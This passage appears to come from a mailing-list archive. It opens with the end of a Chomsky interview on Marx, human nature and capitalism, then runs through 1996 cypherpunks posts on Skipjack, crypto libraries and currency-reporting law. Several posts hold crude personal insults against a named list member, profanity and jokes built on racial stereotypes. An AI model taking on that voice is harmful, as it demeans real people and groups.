directed against the followers of Mr. Marx. There were, in fact, followers
of many different kinds; Pannekoek, Luxembourg, Mattick and others are very
far from Lenin, and their views often converge with elements of
anarcho-syndicalism. Korsch and others wrote sympathetically of the
anarchist revolution in Spain, in fact. There are continuities from Marx to
Lenin, but there are also continuities to Marxists who were harshly
critical of Lenin and Bolshevism. Teodor Shanin's work in the past years on
Marx's later attitudes towards peasant revolution is also relevant here.
I'm far from being a Marx scholar, and wouldn't venture any serious
judgement on which of these continuities reflects the 'real Marx,' if there
even can be an answer to that question.

RBR: Recently, we obtained a copy of your own Notes On Anarchism
(re-published last year by Discussion Bulletin in the USA). In this you
mention the views of the early Marx, in particular his development of the
idea of alienation under capitalism. Do you generally agree with this
division in Marx's life and work - a young, more libertarian socialist but,
in later years, a firm authoritarian?

CHOMSKY: The early Marx draws extensively from the milieu in which he
lived, and one finds many similarities to the thinking that animated
classical liberalism, aspects of the Enlightenment and French and German
Romanticism. Again, I'm not enough of a Marx scholar to pretend to an
authoritative judgement. My impression, for what it is worth, is that the
early Marx was very much a figure of the late Enlightenment, and the later
Marx was a highly authoritarian activist, and a critical analyst of
capitalism, who had little to say about socialist alternatives. But those
are impressions.

RBR: From my understanding, the core part of your overall view is informed
by your concept of human nature. In the past the idea of human nature was
seen, perhaps, as something regressive, even limiting. For instance, the
unchanging aspect of human nature is often used as an argument for why
things can't be changed fundamentally in the direction of anarchism. You
take a different view? Why?

CHOMSKY: The core part of anyone's point of view is some concept of human
nature, however it may be remote from awareness or lack articulation. At
least, that is true of people who consider themselves moral agents, not
monsters. Monsters aside, whether a person who advocates reform or
revolution, or stability or return to earlier stages, or simply cultivating
one's own garden, takes stand on the grounds that it is 'good for people.'
But that judgement is based on some conception of human nature, which a
reasonable person will try to make as clear as possible, if only so that it
can be evaluated. So in this respect I'm no different from anyone else.

You're right that human nature has been seen as something 'regressive,' but
that must be the result of profound confusion. Is my granddaughter no
different from a rock, a salamander, a chicken, a monkey? A person who
dismisses this absurdity as absurd recognises that there is a distinctive
human nature. We are left only with the question of what it is - a highly
nontrivial and fascinating question, with enormous scientific interest and
human significance. We know a fair amount about certain aspects of it - not
those of major human significance. Beyond that, we are left with our hopes
and wishes, intuitions and speculations.

There is nothing regressive about the fact that a human embryo is so
constrained that it does not grow wings, or that its visual system cannot
function in the manner of an insect, or that it lacks the homing instinct
of pigeons. The same factors that constrain the organism's development also
enable it to attain a rich, complex, and highly articulated structure,
similar in fundamental ways to conspecifics, with rich and remarkable
capacities. An organism that lacked such determinative intrinsic structure,
which of course radically limits the paths of development, would be some
kind of amoeboid creature, to be pitied (even if it could survive somehow).
The scope and limits of development are logically related.

Take language, one of the few distinctive human capacities about which much
is known. We have very strong reasons to believe that all possible human
languages are very similar; a Martian scientist observing humans might
conclude that there is just a single language, with minor variants. The
reason is that the particular aspect of human nature that underlies the
growth of language allows very restricted options. Is this limiting? Of
course. Is it liberating? Also of course. It is these very restrictions
that make it possible for a rich and intricate system of expression of
thought to develop in similar ways on the basis of very rudimentary,
scattered, and varied experience.

What about the matter of biologically-determined human differences? That
these exist is surely true, and a cause for joy, not fear or regret. Life
among clones would not be worth living, and a sane person will only rejoice
that others have abilities that they do not share. That should be
elementary. What is commonly believed about these matters is strange
indeed, in my opinion.

Is human nature, whatever it is, conducive to the development of anarchist
forms of life or a barrier to them? We do not know enough to answer, one
way or the other. These are matters for experimentation and discovery, not
empty pronouncements.

The future

RBR: To begin finishing off, I'd like to ask you briefly about some current
issues on the left. I don't know if the situation is similar in the USA but
here, with the fall of the Soviet Union, a certain demoralisation has set
in on the left. It isn't so much that people were dear supporters of what
existed in the Soviet Union, but rather it's a general feeling that with
the demise of the Soviet Union the idea of socialism has also been dragged
down. Have you come across this type of demoralisation? What's your
response to it?

CHOMSKY: My response to the end of Soviet tyranny was similar to my
reaction to the defeat of Hitler and Mussolini. In all cases, it is a
victory for the human spirit. It should have been particularly welcome to
socialists, since a great enemy of socialism had at last collapsed. Like
you, I was intrigued to see how people - including people who had
considered themselves anti-Stalinist and anti-Leninist - were demoralised
by the collapse of the tyranny. What it reveals is that they were more
deeply committed to Leninism than they believed.

There are, however, other reasons to be concerned about the elimination of
this brutal and tyrannical system, which was as much socialist as it was
democratic (recall that it claimed to be both, and that the latter claim
was ridiculed in the West, while the former was eagerly accepted, as a
weapon against socialism - one of the many examples of the service of
Western intellectuals to power). One reason has to do with the nature of
the Cold War. In my view, it was in significant measure a special case of
the 'North-South conflict,' to use the current euphemism for Europe's
conquest of much of the world. Eastern Europe had been the original 'third
world,' and the Cold War from 1917 had no slight resemblance to the
reaction of attempts by other parts of the third world to pursue an
independent course, though in this case differences of scale gave the
conflict a life of its own. For this reason, it was only reasonable to
expect the region to return pretty much to its earlier status: parts of the
West, like the Czech Republic or Western Poland, could be expected to
rejoin it, while others revert to the traditional service role, the
ex-Nomenklatura becoming the standard third world elite (with the approval
of Western state-corporate power, which generally prefers them to
alternatives). That was not a pretty prospect, and it has led to immense
suffering.

Another reason for concern has to do with the matter of deterrence and
non-alignment. Grotesque as the Soviet empire was, its very existence
offered a certain space for non-alignment, and for perfectly cynical
reasons, it sometimes provided assistance to victims of Western attack.
Those options are gone, and the South is suffering the consequences.

A third reason has to do with what the business press calls the pampered
Western workers with their luxurious lifestyles. With much of Eastern
Europe returning to the fold, owners and managers have powerful new weapons
against the working classes and the poor at home. GM and VW can not only
transfer production to Mexico and Brazil (or at least threaten to, which
often amounts to the same thing), but also to Poland and Hungary, where
they can find skilled and trained workers at a fraction of the cost. They
are gloating about it, understandably, given the guiding values.

We can learn a lot about what the Cold War (or any other conflict) was
about by looking at who is cheering and who is unhappy after it ends. By
that criterion, the victors in the Cold War include Western elites and the
ex-Nomenklatura, now rich beyond their wildest dreams, and the losers
include a substantial part of the population of the East along with working
people and the poor in the West, as well as popular sectors in the South
that have sought an independent path.

Such ideas tend to arouse near hysteria among Western intellectuals, when
they can even perceive them, which is rare. That's easy to show. It's also
understandable. The observations are correct, and subversive of power and
privilege; hence hysteria.

In general, the reactions of an honest person to the end of the Cold War
will be more complex than just pleasure over the collapse of a brutal
tyranny, and prevailing reactions are suffused with extreme hypocrisy, in
my opinion.

Capitalism

RBR: In many ways the left today finds itself back at its original starting
point in the last century. Like then, it now faces a form of capitalism
that is in the ascendancy. There would seem to be greater 'consensus'
today, more than at any other time in history, that capitalism is the only
valid form of economic organisation possible, this despite the fact that
wealth inequality is widening. Against this backdrop, one could argue that
the left is unsure of how to go forward. How do you look at the current
period? Is it a question of 'back to basics'? Should the effort now be
towards bringing out the libertarian tradition in socialism and towards
stressing democratic ideas?

CHOMSKY: This is mostly propaganda, in my opinion. What is called
'capitalism' is basically a system of corporate mercantilism, with huge and
largely unaccountable private tyrannies exercising vast control over the
economy, political systems, and social and cultural life, operating in
close co-operation with powerful states that intervene massively in the
domestic economy and international society. That is dramatically true of
the United States, contrary to much illusion. The rich and privileged are
no more willing to face market discipline than they have been in the past,
though they consider it just fine for the general population. Merely to
cite a few illustrations, the Reagan administration, which revelled in free
market rhetoric, also boasted to the business community that it was the
most protectionist in post-war US history - actually more than all others
combined. Newt Gingrich, who leads the current crusade, represents a
superrich district that receives more federal subsidies than any other
suburban region in the country, outside of the federal system itself. The
'conservatives' who are calling for an end to school lunches for hungry
children are also demanding an increase in the budget for the Pentagon,
which was established in the late 1940s in its current form because - as
the business press was kind enough to tell us - high tech industry cannot
survive in a pure, competitive, unsubsidized, 'free enterprise' economy,
and the government must be its saviour. Without the saviour, Gingrich's
constituents would be poor working people (if they were lucky). There would
be no computers, electronics generally, aviation industry, metallurgy,
automation, etc., etc., right down the list. Anarchists, of all people,
should not be taken in by these traditional frauds.

More than ever, libertarian socialist ideas are relevant, and the
population is very much open to them. Despite a huge mass of corporate
propaganda, outside of educated circles, people still maintain pretty much
their traditional attitudes. In the US, for example, more than 80% of the
population regard the economic system as inherently unfair and the
political system as a fraud, which serves the special interests, not the
people. Overwhelming majorities think working people have too little voice
in public affairs (the same is true in England), that the government has
the responsibility of assisting people in need, that spending for education
and health should take precedence over budget-cutting and tax cuts, that
the current Republican proposals that are sailing through Congress benefit
the rich and harm the general population, and so on. Intellectuals may tell
a different story, but it's not all that difficult to find out the facts.

RBR: To a point anarchist ideas have been vindicated by the collapse of the
Soviet Union - the predictions of Bakunin have proven to be correct. Do you
think that anarchists should take heart from this general development and
from the perceptiveness of Bakunin's analysis? Should anarchists look to
the period ahead with greater confidence in their ideas and history?

CHOMSKY: I think - at least hope - that the answer is implicit in the
above. I think the current era has ominous portent, and signs of great
hope. Which result ensues depends on what we make of the opportunities.

RBR: Lastly, Noam, a different sort of question. We have a pint of Guinness
on order for you here. When are you going to come and drink it?

CHOMSKY: Keep the Guinness ready. I hope it won't be too long. Less
jocularly, I'd be there tomorrow if we could. We (my wife came along with
me, unusual for these constant trips) had a marvellous time in Ireland, and
would love to come back. Why don't we? Won't bore you with the sordid
details, but demands are extraordinary, and mounting - a reflection of the
conditions I've been trying to describe.

 --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@extol.com.my>
Date: Mon, 23 Dec 1996 21:40:28 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Certified primes
Message-ID: <96Dec24.215013gmt+0800.21916@portal.extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


So? Are you jealous?

>Timmy `C' May is a certified sexual pervert who wears women's >underwear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 25 Dec 1996 10:32:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: [URGENT] Meet-in-the-middle attack
Message-ID: <199612251832.KAA03358@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Here, Tim C. Maya descends into total inanity. He should have a cold 
shower and/or a Turkish coffee.

        _
       / '
      |
   /><oo><\  Tim C. Maya
  //[ `' ]\\





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 10:36:52 -0800 (PST)
To: Chris Caputo <ccaputo@alt.net>
Subject: Re: [Fwd: usenet censorship]
In-Reply-To: <Pine.BSI.3.93.961224215834.12340g-100000@baklava.alt.net>
Message-ID: <32C1735E.25F8@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Chris Caputo wrote:
> 
> We mean that we are coming up with a new pricing scheme that will allow > us to more accurately match revenue with expenses.

Chris,
  In non-pressrelease language does this mean:
  a. Making a profit.
  b. Trying to at least break even.
  c. Trying not to lose your ass.
  d. Hiring a dyslexic pot-head as Chief Financial Officer was a big
     mistake.

Just Wondering,
  Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Wed, 25 Dec 1996 07:40:33 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Bubbaonics [Ebonics]
Message-ID: <3.0.32.19961225104048.00690320@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/enriched

12/25/96
The Atlanta Journal/The Atlanta Constitution
"The Vent--The Whine Line," page C2

"It's time for our schools to recognize redneck English. It's called Bubbaonics."

with no attribution.

Alec





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 10:35:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Snarfer Programs
In-Reply-To: <v03100b27aedeb335e709@[204.179.135.28]>
Message-ID: <32C1763A.5843@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Are the Password Keystroke Snarfer programs anything like the Password
Keystroke Snipe Programs?
  Some Cypherpunks told me they'd explain the Snipe Programs to me if
I bought a case of beer, but I lost them on the way to their secret
meeting place in the woods, and I had to walk home.
   Gee, they were sure nice guys, though.

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Dec 1996 08:10:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <3.0.32.19961225013128.00cfb688@martigny.ai.mit.edu>
Message-ID: <8X2HZD96w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Fuck Christmas...

"Brian A. LaMacchia" <bal@martigny.ai.mit.edu> writes:

> See in clause (1) where it says, "cause or attempt to cause a domestic
> financial institution to fail to file a report required under section
> 5313(a)"?  See the words "attempt to cause"?  Now go back to EBD's original
> post.  See where he said "Report of Suspicious Transaction"?  See the
> errors in your argument above?  Good.

Here's a somewhat related post I saw on alt.revenge:

]From: dastuart@mail.entrsft.com
]Newsgroups: alt.revenge
]Subject: Re: Car salesmen and dealerships
]Message-ID: <N.122496.022320.78@entrsft.com>
]Date: Tue, 24 Dec 96 07:23:20 GMT
...
]    I remember once, my ex had a problem with a furniture store in
]Fayetteville, NC as they were rude to her on the phone and hung up, she called
]the manager to complain and he was just as rude.
]
]    Wellllllllll.... that didn't set too well with her so she (& I) went down
]the next day to make her monthly payment. She was so upset, that she decided to
]pay the last three payments and get rid of them permanently. The previous day
]she withdrew the money from the bank, @ $120.00 ($40.00 per payment).
]
]    We walked in the store that FRIDAY at 5:15 (they close at 5:30) she went
]ahead of me to the back of the store where they receive pymnts and announced
]that she was totally pi**ed with the attitude of the employees (explained what
]had happened) and that she wanted to pay them off and would not do business
]with them anymore. She asked for and got the finally pay off as I walked
]towards her and placed the money on the counter.
]
]    As I did..... (did I mention that the $120.00 was in UNROLLED PENNIES ?)
]all hell broke lose, the cashier said that they had to be rolled. Rhonda told
]her that she would not and as a matter of fact she spent an hour unrolling
]them.  (it took that long because as we did, we replaced the "wheaties" with
]regular pennies) and asked her if she was refusing payment.
]
]    She called the manager on the phone and came back smugly and said , no we
]are not refusing payment, we are refusing the form of payment, Rhonda said,
]regardless of the 'form' it is US currency and legal.  Not a check which you
]have the option to accept or not.
]
]    She again called the manager and he came back there. Going through this
]again with him, Rhonda said, Now I ask you one more time, regardless of the
]form of payment, this is it, will you accept it or not? If not, then I will
]consider my debt paid in full.
]
]    Finally he agreed to accept it. She told him that she thought that there
]was exactly $120.00 there but wanted him to count it to make sure, because she
]didn't want to short change his company and if there was a penny extra was
]damned if they were going to get it. She went on with him for another round,
]finally he agreed, that they would count it and she could pick up her receipt
]tomorrow.
]
]    Tomorrow, hell no, I come 25 miles to pay this off and I am not going home
]without a receipt. The bottom line is that they wanted to get home, and didn't
]want to mess with this.
]
]    She stated that her debt was considered "PAID IN FULL" and that if they
]wanted to sue her that they could take her to small claims court, and if they
]did, she would appeal the decision if it were not in her favor to a higher
]court (which in NC is Superior) and of course she wanted a trial by jury so
]that at least twelve people would hear the story about their company but not to
]try to put anything damaging in her credit file because she had a press release
]to send to her paper and the one in Fayetteville and would sue them for
]defamation of character (and a few other things).
]
]    We walked out of the store and went home and had to roll the pennies. The
]only thing that we heard from them was a flier in the mail @ 2 weeks later when
]they were having a preferred customer sale. (obviously the fliers were sent out
]before they took our name off of their mailing list.
]
]stuart
]

I wonder if something in U.S.C. say that if you try to pull this trick on
a U.S.G. agency, you're guilty of "unlawful structuring" or some such shit.

Personally, Jim Bell is an asshole, but he's right about many things.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 25 Dec 1996 11:16:43 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: clipper plans 4 sale (was Re: Earl Edwin Pitts, $224,000)
In-Reply-To: <199612242119.QAA16490@homeport.org>
Message-ID: <199612251916.LAA17341@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[publish skipjack]
>
>	Right now, we're shooting to make the ITARs irrelevant by
>saying things like 'IDEA is Swiss, and when we can't export it from
>the US.  What does that do to competitiveness?'  We can't make that
>claim about Skipjack.  Skipjack is an NSA designed cipher which the
>agency probably expects will be publicised.

they spent millions of dollars to hide the encryption on the chip--
using state-of-the-art technology from what I understand. it would have
been far cheaper not to have done this.  also, the
chip manufacturer was under very high security. 

so, seems like exactly
the opposite to me-- they don't want it to be publicized. in fact
when it was first released there was some verbiage in the documents
about how the chip design would be used to prevent such an amazingly
powerful algorithm from getting into private hands without 
"appropriate safeguards". so I don't buy your theory.

publishing skipjack would be a very, very significant cpunk victory.
recall that DES was slightly redesigned by the NSA, and about 20
years later it was discovered it was done to possibly make it
less vulnerable to "differential cryptoanalysis". 20 years later!
that suggests that the NSA may be up to 20 years ahead of public/academic
crypto research, at least at that point.

anyway, my point is that if skipjack was published, similar insights
into what the NSA is thinking would be available. can you point to
an algorithm other than DES officially sanctioned by NSA? skipjack
is even better, it was *built* by them, and apparently to be highly
secure. the insights available to private researchers after studying
the algorithm would be very significant imho. it would be a snapshot
made very recently of what the nsa considers a state-of-the-art
encryption algorithm. especially useful considering that DES is
about to die and people are looking for alternatives.

note that many people suspect Skipjack is very similar to the DES
in that it is built out of Sboxes and Pboxes. so in that sense
the basic design is probably not all that different. it would be
disappointing if it wasn't different from DES in some interesting
way. I doubt this would be the case.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 25 Dec 1996 11:22:37 -0800 (PST)
To: bal@martigny.ai.mit.edu (Brian A. LaMacchia)
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <3.0.32.19961225013128.00cfb688@martigny.ai.mit.edu>
Message-ID: <199612251920.LAA31394@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian A. LaMacchia writes:
> 
> At 09:35 PM 12/24/96 -0800, jim bell wrote:
> >Bzzt, wrong answer!  By definition, if the report was filed as a
> consequence of >the transaction, then the transaction was reported IN FACT
> and the person didn't >evade it!   (whether he wanted to evade it is, of
> course, pure speculation on your >part.  It is, obviously, questionable
> whether the government can make a person's >mere _desires_ criminal.)
> 
> Please, Jim, *go read the law*.  Do it now, before you even think about
> replying to this message, else you'll say something else stupid and
> irrelevant.  Look, I'll even give you the complete, specific URL for the
> section of the U.S. Code in question; all you have to do is cut-and-paste
> it into your favorite Web browser:
> 
> 	http://www.law.cornell.edu/uscode/31/5324.html

It appears that Jim's 100% wrong- they omit the 'Suspicious
Transaction' report in the list of reports that the gambler was
busted for trying to avoid:


Section 5324:

(a) Domestic Coin and Currency Transactions. - No person shall for the
purpose of evading the reporting requirements of section 5313(a),
      section 5325, or the regulations issued thereunder or section 5325
      or regulations prescribed under such section 5325 (FOOTNOTE 1)
      with respect to such transaction -

      (FOOTNOTE 1) So in original. See 1992 Amendment note below.
			(1) cause or attempt to cause a domestic financial institution
            to fail to file a report required under section 5313(a),
            section 5325, or the regulations issued thereunder or
            section 5325 or regulations prescribed under such section
            5325; (FOOTNOTE 1)
            (2) cause or attempt to cause a domestic financial
            institution to file a report required under section 5313(a),
            section 5325, or the regulations issued thereunder or
            section 5325 or regulations prescribed under such section
            5325 (FOOTNOTE 1) that contains a material omission or
            misstatement of fact; or
			(3) structure or assist in
            structuring, or attempt to structure or assist in
            structuring, any transaction with one or more domestic
            financial institutions.


Section 5313 is the 'normal' reporting section, Section 5318(g)
is "suspicious" transactions (note that it wasn't listed in 5324 above):

(g) Reporting of Suspicious Transactions. - 
            (1) In general. - The Secretary may require any financial
            institution, and any director, officer, employee, or agent
            of any financial institution, to report any suspicious
            transaction relevant to a possible violation of law or
            regulation. 

			(2) Notification prohibited. - A financial
            institution, and a director, officer, employee, or agent of
            any financial institution, who voluntarily reports a
            suspicious transaction, or that reports a suspicious
            transaction pursuant to this section or any other authority,
            may not notify any person involved in the transaction that
            the transaction has been reported.


This is really scary to someone like me who doesn't often read
laws.  They're required to report "suspicious" transactions
(with the definition of "suspicious" left completely wide open)
and they're not allowed to tell you that you have been reported.
This sounds like police-state tactics, not something that would
happen in a free and open society.

It's also interesting to note that section 5313(a) similarly does
not define what is to be reported.  Is this defined elsewhere, or
can it be changed at any time by the Secretary of the Treasury?

Reading section 5324, it sounds (to me, a layman) that there has to
be some intent to evade the reporting requirements.  Does this mean
that prosecutors would have to prove intent?  Does simply getting
checks for $9000 prove intent?  I sure hope not as I have recently received
a couple checks for consulting work that have just happened to be
slightly under ten grand.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Dec 1996 09:00:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612230641.BAA13632@mercury.peganet.com>
Message-ID: <Zk4HZD100w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't see what the fuck Yebonics has to do with crypto, but another
Yebonics joke showed up in my rec.humor.funny:

]From: mklein@voicenet.com (Michael Klein)
]Newsgroups: rec.humor.funny
]Subject: Ebonics
]Keywords: topical, chuckle, racial stereotypes
]Message-ID: <Sa7e.51a7@clarinet.com>
]Date: Tue, 24 Dec 96 12:20:03 EST
]Lines: 13
]Approved: funny-request@clari.net
]
]Knock knock.
]Who's there?
]I.B.
]I.B. who?
]I.B. bilingual.
]
]--
]Selected by Jim Griffith.  MAIL your joke to funny@clari.net.
]Attribute the joke's source if at all possible.  A Daemon will auto-reply.
]
]Remember: PLEASE spell check and proofread your jokes.  You think I have
]time to hand-correct everybody's postings? For the full submission guidelines,
]see http://comedy.clari.net/rhf/

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 11:14:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: The 'Thot Police'
Message-ID: <32C18AA0.578E@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


The best defence against the Thot Police is to say something
intelligent,
and make your break for it while they are scratching their head, and 
saying, "Huh?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 11:14:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank You, CypherPunks
Message-ID: <32C19022.7A11@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


I don't care if conference does contain the weirdest bunch of bozos
it has ever been my misfortune to encounter.
   Thank you, each and every one, for not posting 58,287,489 messages
saying "Merry Xmas", "Happy Holidays", and "Season's Greetings".
   All I want for 'Xmas' is for just 'one' of these 58,287,489 people
to give me a 500 Gigabyte hard drive to store all these Xmas greeting
messages on.

Toto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 12:02:44 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Reflections on the Bernstein ruling
In-Reply-To: <199612250528.VAA26575@mail.pacifier.com>
Message-ID: <32C1A102.6738@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:

> Presumably, if the legal system followed its own rules...

   Presumably, if pigs could fly...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 12:04:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Canuckonics
In-Reply-To: <md5:71515EE75212A73C8B95C19B5E1C9355>
Message-ID: <32C1A156.30CD@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


The Complete Canuckonics Dicionary
   (c) 1997, Pearl Harbor Productions
 
 Syntax                Translation
 ------                -----------
  eh?                      huh?
 
 Toto
   "Pearl Harbor Computers, Ltd."
       "We Don't Eat Dogs"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 25 Dec 1996 11:10:39 -0800 (PST)
To: jfricker@vertexgroup.com (John Fricker)
Subject: Re: Encryption Algorithms
In-Reply-To: <19961224201047358.AAA219@dev.vertexgroup.com>
Message-ID: <199612251907.OAA18540@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


I maintain a list of crypto libraries at www.homeport.org/~adam/crypto

Adam


John Fricker wrote:
| I've got some comments on this and pointers at 
| http://www.program.com/resources/crypto.html and /source/crypto/index.html
| 
| (If any cypherpunks still give a shit about crypto I would appreciate any 
| pointers to additional crypto resources on the net.)
| 
| >Adam Breaux (admin@veracruz.net) said 
| 
| >Is there a good source on the net for implemented C/C++ routines such 
| >as a DES algorithm? I am a programmer in need of some fairly secure 
| >encryption routine. Any help would be greatly appreciated.
| >
| >Thanks
| >AdamX
| >---
| >Adam Breaux
| >admin@veracruz.net
| >http://www.veracruz.net       {Corporate Page }
| >http://www.abyss.com          {Extracurricular}
| >http://www.iso-america.com    {In Search Of...}
| >
| >"Violence is a cruel world doing what it 
| >does best...break the habit...BE NICE" --- me.
| >End of quote
| 
| --j
| --------------------------------------------------------------------
| | John Fricker (jfricker@vertexgroup.com)
| | -random notes-
| | My PGP public key is available by sending 
| | me email with subject "send pgp key".
| | www.Program.com is a good programmer web site.
| --------------------------------------------------------------------
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 25 Dec 1996 15:33:29 -0800 (PST)
To: vipul@pobox.com
Subject: Re: Iranian clergic attacks Internet as 'poison' to the masses (fwd)
In-Reply-To: <199612252246.WAA00230@fountainhead.net>
Message-ID: <32C1A5EF.4305@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Vipul Ved Prakash wrote:
> 
> *** Iranian clergic attacks Internet as 'poison' to the masses

  So does Pat Robertson.  Must be a 'spiritual' thing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 25 Dec 1996 11:42:18 -0800 (PST)
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: clipper plans 4 sale (was Re: Earl Edwin Pitts, $224,000)
In-Reply-To: <199612251916.LAA17341@netcom13.netcom.com>
Message-ID: <199612251938.OAA18612@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
| [publish skipjack]
| >	Right now, we're shooting to make the ITARs irrelevant by
| >saying things like 'IDEA is Swiss, and when we can't export it from
| >the US.  What does that do to competitiveness?'  We can't make that
| >claim about Skipjack.  Skipjack is an NSA designed cipher which the
| >agency probably expects will be publicised.
| 
| they spent millions of dollars to hide the encryption on the chip--
| using state-of-the-art technology from what I understand. it would have
| been far cheaper not to have done this.  also, the
| chip manufacturer was under very high security. 
| 
| so, seems like exactly
| the opposite to me-- they don't want it to be publicized. in fact
| when it was first released there was some verbiage in the documents
| about how the chip design would be used to prevent such an amazingly
| powerful algorithm from getting into private hands without 
| "appropriate safeguards". so I don't buy your theory.

	I said expects, not wants.  The NSA knows that Skipjack is a
fat target, and probably, despite efforts at hardening it, a soft
target as well.  So they took steps to make it tough, but probably
expect that those efforts will fail.

| publishing skipjack would be a very, very significant cpunk victory.
| recall that DES was slightly redesigned by the NSA, and about 20
| years later it was discovered it was done to possibly make it
| less vulnerable to "differential cryptoanalysis". 20 years later!
| that suggests that the NSA may be up to 20 years ahead of public/academic
| crypto research, at least at that point.

	Bruce Schneier gave a talk 2 years ago at the Crypto rump
session where he talked about 'Open Source Skipjack.'  The talk notes
may be on the web.

| anyway, my point is that if skipjack was published, similar insights
| into what the NSA is thinking would be available. can you point to

	I know that.  I honestly don't think it would be a sufficient
propaganda victory to break through the 'tamper-resistant' housing and
reverse engineer the algorithim to make it worth the loss of respect
for 'revealing national security codes.'

	The big losers would be the smartcard folks.  Its not clear to
me that 'cypherpunks' would get more positive PR than negative.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Caputo <ccaputo@alt.net>
Date: Wed, 25 Dec 1996 16:55:21 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: [Fwd: usenet censorship]
In-Reply-To: <32C1735E.25F8@sk.sympatico.ca>
Message-ID: <Pine.BSI.3.93.961225164045.29512B-100000@baklava.alt.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about the press-release'ish language - twas not my intention.  I
would say (b), with happy customers and (a) being the goal.  The service
we provide incurs significant expenses, mainly because of the bandwidth
involved, and we just need to make sure the cost of these expenses is
being recovered in a fair way, before we grow any more. 

Chris Caputo
President, Altopia Corporation

On Wed, 25 Dec 1996, Carl Johnson wrote:
> Chris Caputo wrote:
> > We mean that we are coming up with a new pricing scheme that will
> > allow us to more accurately match revenue with expenses. 
> 
> Chris,
>   In non-pressrelease language does this mean:
>   a. Making a profit.
>   b. Trying to at least break even.
>   c. Trying not to lose your ass.
>   d. Hiring a dyslexic pot-head as Chief Financial Officer was a big
>      mistake.
> 
> Just Wondering,
>   Toto







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BJORN2LUZE@prodigy.com (NATHAN MALLAMACE)
